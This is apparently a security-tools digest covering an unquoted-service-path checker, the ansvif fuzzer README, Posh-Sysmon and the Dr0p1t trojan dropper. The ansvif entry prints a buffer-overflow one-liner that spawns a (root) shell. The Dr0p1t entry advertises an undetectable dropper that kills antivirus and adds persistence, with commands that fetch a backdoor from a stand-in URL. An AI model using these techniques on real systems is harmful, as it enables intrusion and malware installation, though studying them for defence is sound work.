Unquoted Service Path

In Windows environments, when a service is started the system attempts to locate the service executable in order to launch it. If the executable path is enclosed in quotes, the system knows exactly which file to run. However, if the path to the application binary doesn't contain any quotes then […]
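
The security-relevant mechanism behind the summary is that for an unquoted ImagePath containing spaces, CreateProcess tries each space-delimited prefix as the program name (appending .exe when it has no extension), so C:\Program Files\Vendor\app.exe is first attempted as C:\Program.exe, then C:\Program Files\Vendor.exe, and a user who can write to one of those earlier locations gets their binary run with the service's privileges. The checker below is an added example for this digest entry, not code from the linked pentestlab post. The service records and the environment map are constructed sample data in the shape of the registry's ImagePath value; on a real host you would feed in the PathName column of `wmic service get name,pathname` or `Get-CimInstance Win32_Service` instead, and then test each candidate directory for write access.

```python
"""Unquoted service path check (added example, not the linked post's code).

Emulates the candidate order CreateProcess uses for an unquoted command line
and flags services whose ImagePath yields hijackable candidates.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed sample data: (service name, ImagePath as stored in the registry).
SAMPLE_SERVICES: List[Tuple[str, str]] = [
    ("GoodSvc", '"C:\\Program Files\\Good Vendor\\svc host\\good.exe" -k run'),
    ("BadSvc", "C:\\Program Files\\Bad Vendor\\svc host\\bad.exe -config x.ini"),
    ("NoSpaces", "C:\\Windows\\system32\\svchost.exe -k netsvcs"),
    ("Expand", "%ProgramFiles%\\Vendor Tools\\agent.exe"),
]
# Constructed stand-in for the environment the SCM expands REG_EXPAND_SZ values with.
SAMPLE_ENV: Dict[str, str] = {"ProgramFiles": "C:\\Program Files"}


@dataclass
class Finding:
    name: str
    image_path: str
    candidates: List[str]  # executables CreateProcess would try before the real one


def expand_env(path: str, env: Dict[str, str]) -> str:
    """Expand %VAR% references as the SCM does for REG_EXPAND_SZ ImagePaths.
    Unknown variables are left in place so the record is still inspected."""
    return re.sub(r"%([^%]+)%", lambda m: env.get(m.group(1), m.group(0)), path)


def _has_extension(path: str) -> bool:
    # Only the last path component counts: "C:\\Vendor 1.0\\app" has none.
    return "." in path.rsplit("\\", 1)[-1]


def hijack_candidates(image_path: str) -> List[str]:
    """Return the executables CreateProcess would try, in order, for an
    unquoted ImagePath, stopping at the first space-delimited prefix that
    already carries an extension (the intended binary).  An empty list means
    the path is quoted or has no space before the executable name.

    CreateProcess treats the string up to each space as the program name and
    appends .exe when that candidate has no extension, so
    C:\\Program Files\\Vendor\\app.exe -x is tried as
    C:\\Program.exe, C:\\Program Files\\Vendor\\app.exe, ...
    Whether the last entry is the intended file or a hijack point depends on
    what exists on disk; the first candidate that exists is what runs.
    """
    s = image_path.strip()
    if s.startswith('"'):
        return []  # quoted: the executable is unambiguous
    tokens = s.split(" ")
    candidates: List[str] = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if _has_extension(prefix):
            break  # this prefix names the real executable
        candidates.append(prefix + ".exe")
    return candidates


def scan(services: List[Tuple[str, str]], env: Dict[str, str]) -> List[Finding]:
    """Flag every service whose (expanded) ImagePath yields hijack candidates."""
    findings = []
    for name, image_path in services:
        cands = hijack_candidates(expand_env(image_path, env))
        if cands:
            findings.append(Finding(name, image_path, cands))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_SERVICES, SAMPLE_ENV):
        print(f"{f.name}: {f.image_path}")
        for c in f.candidates:
            print(f"    tried before the real binary: {c}")
```

Each listed candidate is a location to check with icacls for write access by unprivileged users (Authenticated Users, Users, Everyone); a writable one combined with a service running as LocalSystem is the privilege escalation the linked post describes.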

Link: https://pentestlab.blog/2017/03/09/unquoted-service-path/

ansvif – An Advanced Fuzzing Framework Designed To Find Vulnerabilities In C/C++ Code.

ansvif, written primarily in C++, is designed to find code bugs by throwing garbage input at programs to see how they react. This is effective at finding bugs because not every type of input is handled and buffers are not always bounds-checked. It also comes in handy when writing (and protecting against) buffer overflow exploits, as well as string input validation vulnerabilities (the %s format-string bug).

Dependencies: automake, autoconf-archive, zlib1g-dev, libcrypto++, g++, gcc

Compilation:

Linux:

    $ aclocal && autoconf && automake -a && ./configure && make

Or, if you would like to play with the syscall fuzzer:

    $ aclocal && autoconf && automake -a && ./configure --enable-syscalls && make

OpenBSD (the installed automake/autoconf versions are looked up in /usr/local/bin so the wrapper scripts can find them):

    $ AUTOMAKE_VERSION=`ls /usr/local/bin/automake-* | head -n 1 | sed -e 's/.*-//'` \
      AUTOCONF_VERSION=`ls /usr/local/bin/autoconf-* | head -n 1 | sed -e 's/.*-//'` \
      aclocal && AUTOMAKE_VERSION=`ls /usr/local/bin/automake-* | head -n 1 | sed -e 's/.*-//'` \
      AUTOCONF_VERSION=`ls /usr/local/bin/autoconf-* | head -n 1 | sed -e 's/.*-//'` \
      autoconf && AUTOMAKE_VERSION=`ls /usr/local/bin/automake-* | head -n 1 | sed -e 's/.*-//'` \
      AUTOCONF_VERSION=`ls /usr/local/bin/autoconf-* | head -n 1 | sed -e 's/.*-//'` automake -a \
      && CXX=eg++ ./configure && make

Windows: Windows binaries are now designed to be compiled with MinGW-W64 (since ansvif uses threading, download a version of MinGW-W64 g++ with SEH). Go to where you installed MinGW-W64, click mingw-64.bat, then:

    g++.exe src/common.cpp src/win/bin2hex.cpp src/win/bin2hex_pc.cpp src/win/popen2.cpp src/win/main.cpp src/win/help.cpp src/match_seg.cpp src/win/sys_string.cpp src/win/sys_string_pc.cpp src/win/man_read.cpp src/randomizer.cpp src/trash.cpp -I./ -I./include -std=c++11 -lstdc++ -lpthread -O2 -o ansvif.exe -static -static-libgcc -static-libstdc++
    gcc src/win/printf.c -o printf.exe

Note: cygwin .dll external files are no longer required, as we now compile with g++ from MinGW.

On Windows 7 PowerShell v2 is installed by default; however, this program requires at least PowerShell v5. Windows 10 includes PowerShell v5. You can download the Windows Management Framework (which includes newer versions of PowerShell) from Microsoft: https://www.microsoft.com/en-us/download/details.aspx?id=50395

Testing: If you would like to try out the example code, compile faulty.c with:

    $ gcc faulty.c -o faulty

Using the example code: You can point the return address back at \xff\x05\x40\x00\x00\x00\x00\x00 (the subroutine containing the code that spawns bash) with:

    $ ./faulty -a $(perl -e 'print "A"x24;print "\x00\xff\x05\x40\x00\x00\x00\x00\x00"')

The address may be a little different under your distro; check gdb if you really want to try it out. The command above /should/ drop you at a bash prompt. If the binary is set up so that anyone can execute it as another user (setuid), it will attempt to spawn a root shell. Or simply run make test.

Usage (important note: Windows users will have to run ansvif.exe from PowerShell for it to work!):

    $ ./find_suid /usr/bin/ /bin/ /sbin/
    $ ./ansvif -[tm] [template/manpage] -c /path/to/executable -b buffersize

Examples:

Linux/BSD:

    $ echo "Marshall" ./ansvif -t examples/template -c ./faulty -b 64
    $ ./ansvif -m mount -c /bin/mount -e examples/mount_e.txt -x examples/mount_o.txt \
      -f 8 -b 2048
    $ ./ansvif -t examples/blank.txt -F tmp/tmphtml -x examples/htmltags.txt -c /usr/bin/iceweasel -b \
      128 -A "file:///home/username/src/ansvif/tmp/tmphtml" -f 2 -n -R "sleep 3 && killall \
      iceweasel" -S ">"
    $ cat examples/linux_syscalls_implemented.list | xargs -P \
      `cat examples/linux_syscalls_implemented.list | wc -l` -I {calls} ./ansvif -t examples/space.txt \
      -B "{calls} " -c ./syscalls -o syscall_crash -f 1 -z -d -b 16

Windows:

    PS C:\ansvif\bin\ansvif_win> .\ansvif -t ..\..\examples\space -F ..\..\tmp\tmphtml -x `
      ..\..\examples\htmltags -c `
      'C:\Program Files (x86)\Google\Chrome\Application\chrome.exe' `
      -b 128 -A "file:///C:\\Users\marsh\OneDrive\Documents\Code\ansvif\tmp\tmphtml" `
      -f 2 -n -S ">" -R "sleep 2 ; Stop-Process -Name chrome"

Options:

    -t  This file should hold line-by-line command arguments as shown in the example file.
    -e  This file should hold line-by-line environment variables as shown in the example file. You can usually get these by doing something like:
        $ strings /bin/mount | perl -ne 'print if /[A-Z]=$/' > mount_envs
    -c  Specifies the command path.
    -p  Specifies the manpage section (as an integer, usually 1 or 8).
    -m  Specifies the command's manpage.
    -D  Dumps what's found in the manpage.
    -f  Number of threads to use. Default is 2.
    -b  Specifies the buffer size to fuzz with. 256-2048 is usually sufficient.
    -r  Uses only random garbage data.
    -o  Writes output to a log file.
    -z  Randomize the buffer size from 1 to what is specified by -b.
    -x  Other junk to put in. Usernames and such can go here.
    -S  Separator between options.
    -s  Omitted character specification. Defaults are <>\\n |&\[]\()\{}:;\ and newline is mandatory.
    -T  Timeout for threads.
    -W  Timeout for threads.
    -L  Unprivileged user to run as if root.
    -A  Always put what follows this after the command to run.
    -B  Always put what follows this before the command to run.
    -F  File to feed into the program; -x data along with the normal fuzzing data will be put in it.
    -n  Never use random data in the fuzz.
    -R  Run this command after each fuzz.
    -C  A non-standard error code to detect.
    -V  Use Valgrind if installed.
    -1  Try to make it fault once; if it doesn't happen, exit with error code 64. Useful for scripting.
    -P  Use % to represent binary in the fuzz.
    -M  Max arguments to use in the fuzz.
    -y  Short for -b 0; usually only useful with -A or -B.
    -K  Keep fuzzing after a crash in the target.
    -v  Verbose.
    -d  Debug data.
    -h  Shows the help page.

Recommendations: For long fuzzes or file fuzzing it is recommended to keep the files (including, if possible, the binary you are fuzzing) in memory, i.e. somewhere like /var/run/shm, where disk thrash is minimal and fuzzing is somewhat faster, especially when large files are being handled. Be warned, however: you will lose your fuzzed files if they are in shm and you reboot the machine! DO NOT RUN THIS CODE IN A PRODUCTION ENVIRONMENT! If you try setting faulty.c's output to suid(0), then PLEASE do it in a virtual machine, or at least on a machine that you don't care about. Other than that, just play around and have fun!

Notes: Windows users must run ansvif from PowerShell. Linux and Windows code should be relatively stable. Syscall fuzzing under Linux is under heavy development.

Download ansvif
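
The options list above (-b, -z, -s, -C, -T, -K) describes a fuzz loop whose mechanics are easier to see in code. The harness below is an added, deliberately simplified stand-in written for this digest entry; it is not ansvif's own code and does not reproduce its template or manpage handling. The crashing target is constructed: a tiny Python program that kills itself with SIGSEGV once its argument exceeds a fixed length, standing in for a C program with an unchecked buffer such as the README's faulty.c.

```python
"""Minimal argument fuzzer in the spirit of ansvif's -b/-z/-s/-C/-T/-K options.
Added illustration, not ansvif's code; target program is constructed."""
import random
import string
import subprocess
import sys
from typing import List, Optional, Tuple

# ansvif's documented default omitted characters (-s): shell-significant bytes.
DEFAULT_OMIT = frozenset("<>\n |&[](){}:;\\")

# Constructed target: argv[1] longer than 47 bytes "smashes the stack" and the
# process dies from SIGSEGV, which is how a real overflow in a C target looks.
CRASHY_TARGET: List[str] = [
    sys.executable, "-c",
    "import os, signal, sys\n"
    "if len(sys.argv[1]) > 47: os.kill(os.getpid(), signal.SIGSEGV)\n",
]


def make_buffer(size: int, randomize: bool, rng: Optional[random.Random] = None,
                omit=DEFAULT_OMIT) -> str:
    """Garbage of `size` bytes (-b), or 1..size bytes when randomize (-z),
    drawn from printable ASCII minus the omitted set (-s)."""
    rng = rng or random.Random()
    alphabet = [c for c in string.printable if c not in omit]
    n = rng.randint(1, size) if randomize else size
    return "".join(rng.choice(alphabet) for _ in range(n))


def classify(returncode: Optional[int], nonstandard_error: Optional[int]) -> str:
    """Map a child's result to an outcome.  On POSIX a negative return code is
    the signal that killed the child (-11 == SIGSEGV); nonstandard_error
    mirrors -C, an exit status the target itself uses to report a fault."""
    if returncode is None:
        return "timeout"
    if returncode < 0:
        return "crash"
    if nonstandard_error is not None and returncode == nonstandard_error:
        return "error-code"
    return "ok"


def run_once(cmd: List[str], payload: str, timeout: float) -> Optional[int]:
    """Run the target with the payload as its last argument; None on timeout (-T)."""
    try:
        proc = subprocess.run(cmd + [payload], capture_output=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        return None
    return proc.returncode


def fuzz(cmd: List[str], iterations: int, size: int, randomize: bool = False,
         nonstandard_error: Optional[int] = None, timeout: float = 5.0,
         keep_going: bool = False, seed: int = 0) -> List[Tuple[str, str]]:
    """Fuzz `cmd` and return (outcome, payload) for every non-ok run.
    Stops at the first finding unless keep_going (-K), so the payload that
    triggered the fault is preserved for reproduction."""
    rng = random.Random(seed)
    findings: List[Tuple[str, str]] = []
    for _ in range(iterations):
        payload = make_buffer(size, randomize, rng)
        outcome = classify(run_once(cmd, payload, timeout), nonstandard_error)
        if outcome != "ok":
            findings.append((outcome, payload))
            if not keep_going:
                break
    return findings


if __name__ == "__main__":
    hits = fuzz(CRASHY_TARGET, iterations=20, size=64, randomize=True, keep_going=True)
    for outcome, payload in hits:
        print(f"{outcome}: len={len(payload)} {payload!r}")
```

With randomize on, only payloads that happen to exceed the threshold crash the target, which is the reason ansvif's -z exists: varying the size finds the boundary rather than just confirming that a large buffer faults.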

Link: http://feedproxy.google.com/~r/PentestTools/~3/RfFeMT6E2yc/ansvif-advanced-fuzzing-framework.html

Posh-Sysmon Module for Creating Sysmon Configuration Files

Sysmon configuration can be complex and hard to maintain by hand. For this purpose I created a module called Posh-Sysmon some time ago to aid in the creation and maintenance of configuration files. The module was initially written after the release of Sysmon version 2.0 and has been maintained and expanded as new versions were released, up to the current one at the time of writing, version 6.0.
The module is written for PowerShell v3.0 and above and can be installed from the PowerShell Gallery, if running PowerShell 5.0 or 5.1, using the cmdlet

Link: http://www.darkoperator.com/blog/2017/2/17/posh-sysmon-powershell-module-for-creating-sysmon-configuration-files

Dr0p1t-Framework – A Framework That Creates An Advanced FUD Dropper With Some Tricks

Have you ever heard about trojan droppers? You can read about them here. Dr0p1t lets you create a dropper like any other tool, but this time FUD (fully undetectable) and with some tricks 😉

Features:
- Works with Windows and Linux
- Adds the malware to startup after downloading it
- Adds the malware to the task scheduler after downloading it
- Finds and kills the antivirus before running the malware
- Runs a custom (batch|powershell|vbs) file you have chosen before running the malware
- Bypasses the execution policy when running PowerShell scripts
- Uses UPX to compress the dropper after creating it
- Lets you choose an icon for the dropper after creating it

Screenshots (not reproduced here): On Windows; On Linux (Backbox); Help menu

Usage: Dr0p1t.py Malware_Url [Options]

Options:
    -h, --help  show this help message and exit
    -s          Add your malware to startup (persistence)
    -t          Add your malware to the task scheduler (persistence)
    -k          Kill antivirus processes before running your malware
    -b          Run this batch script before running your malware. Check the scripts folder
    -p          Run this PowerShell script before running your malware. Check the scripts folder
    -v          Run this VBS script before running your malware. Check the scripts folder
    --only32    Download your malware for 32-bit devices only
    --only64    Download your malware for 64-bit devices only
    --upx       Use UPX to compress the final file
    -i          Use an icon for the final file. Check the icons folder
    -q          Stay quiet (no banner)
    -u          Check for updates
    -nd         Display less output information

Examples:

    ./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx
    ./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
    ./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1

Prerequisites: Python 3.x (3.5 preferred); the Python libraries listed in requirements.txt

Installation: First download it with

    git clone https://github.com/D4Vinci/Dr0p1t-Framework

If you are on Linux:

    cd Dr0p1t-Framework
    pip install -r requirements.txt
    ./Dr0p1t.py

If you are on Windows, download it and then:

    cd Dr0p1t-Framework
    pip install -r requirements.txt
    pip install -r windows_requirements.txt
    ./Dr0p1t.py

The libraries in windows_requirements.txt enable Unicode output on Windows, which makes coloring possible.

Todo: Python 2 support; work on UAC bypass; work on spreading on the device and maybe in the LAN too; injecting dr0pp3r into another program; more modules

Download Dr0p1t-Framework

Link: http://feedproxy.google.com/~r/PentestTools/~3/JXvzQSkcB8s/dr0p1t-framework-framework-that-creates.html